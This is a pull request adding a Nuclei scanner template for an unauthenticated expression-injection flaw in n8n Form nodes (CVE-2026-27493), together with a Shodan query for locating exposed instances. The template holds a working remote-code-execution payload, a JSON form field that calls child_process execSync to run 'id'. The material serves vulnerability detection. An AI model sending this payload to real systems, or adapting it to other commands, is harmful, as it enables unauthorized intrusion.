### PR TITLE
Create CVE-2026-27493

### DIFF
--- a/http/cves/2026/CVE-2026-27493
+++ b/http/cves/2026/CVE-2026-27493
@@ -22,8 +22,8 @@ http:
   - raw:
       - |
         POST /form/contact-us HTTP/1.1
-        Host: {{hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36        (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
         Content-Type: application/json
         Content-Length: 159
 

--- a/http/cves/2026/CVE-2026-27493
+++ b/http/cves/2026/CVE-2026-27493
@@ -1,0 +1,41 @@
+id: CVE-2026-27493
+
+info:
+  name: n8n Form Node Double-Evaluation - Expression Injection
+  author: omkar7505
+  severity: critical
+  description: n8n versions prior to 2.10.1 / 2.9.3 / 1.123.22 are vulnerable to a double-evaluation bug in Form nodes. An unauthenticated attacker can inject expressions into form fields which are executed when the form renders a subsequent step or confirmation page.
+  reference:
+    - https://www.pillar.security/blog/zero-click-unauthenticated-rce-in-n8n-a-contact-form-that-executes-shell-commands
+    - https://github.com/n8n-io/n8n/security/advisories/GHSA-75g8-rv7v-32f7
+  metadata:
+    vendor: n8n
+    product: n8n
+    shodan-query: http.favicon.hash:-831756631
+  classification:
+    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
+    cvss-score: 9.5
+    cve-id: CVE-2026-27493
+  tags: cve,cve2026,rce,unauthenticated,n8n
+
+http:
+  - raw:
+      - |
+        POST /form/contact-us HTTP/1.1
+        Host: {{hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36        (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
+        Content-Type: application/json
+        Content-Length: 159
+
+        {"Name":"{{ ((g) => g.getBuiltinModule('child_process').execSync('id').toString())({...process}) }}","Email":"test@test.com","Company":"test","Message":"test"}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)'
+
+      - type: status
+        status:
+          - 200

--- a/http/cves/2026/CVE-2026-27493.yaml
+++ b/http/cves/2026/CVE-2026-27493.yaml
@@ -21,7 +21,7 @@ info:
 http:
   - raw:
       - |
-        POST /form/contact-us HTTP/1.1
+        POST / HTTP/1.1
         Host: {{Hostname}}
         User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
         Content-Type: application/json

--- a/http/cves/2026/CVE-2026-27493.yaml
+++ b/http/cves/2026/CVE-2026-27493.yaml
@@ -21,7 +21,7 @@ info:
 http:
   - raw:
       - |
-        POST / HTTP/1.1
+        POST /form/contact-us HTTP/1.1
         Host: {{Hostname}}
         User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
         Content-Type: application/json


### PR DESCRIPTION
### PR Information

This PR adds a new template for CVE-2026-27493, a critical unauthenticated Expression Injection vulnerability in n8n Form nodes. The vulnerability allows an attacker to execute arbitrary shell commands (RCE) by injecting expressions into form fields, which are then double-evaluated by the server.

- Added CVE-2026-27493
- References:
  - https://www.pillar.security/blog/zero-click-unauthenticated-rce-in-n8n-a-contact-form-that-executes-shell-commands
  - https://github.com/n8n-io/n8n/security/advisories/GHSA-75g8-rv7v-32f7

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

**Description:**
The template targets the `/form/contact-us` endpoint (a common default) and attempts to execute the `id` command via a JavaScript expression. It matches the standard Linux `uid/gid` output in the response body.

**Shodan Query:**
`http.favicon.hash:-831756631`

**Affected Versions:**
n8n < 2.10.1, < 2.9.3, and < 1.123.22.

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
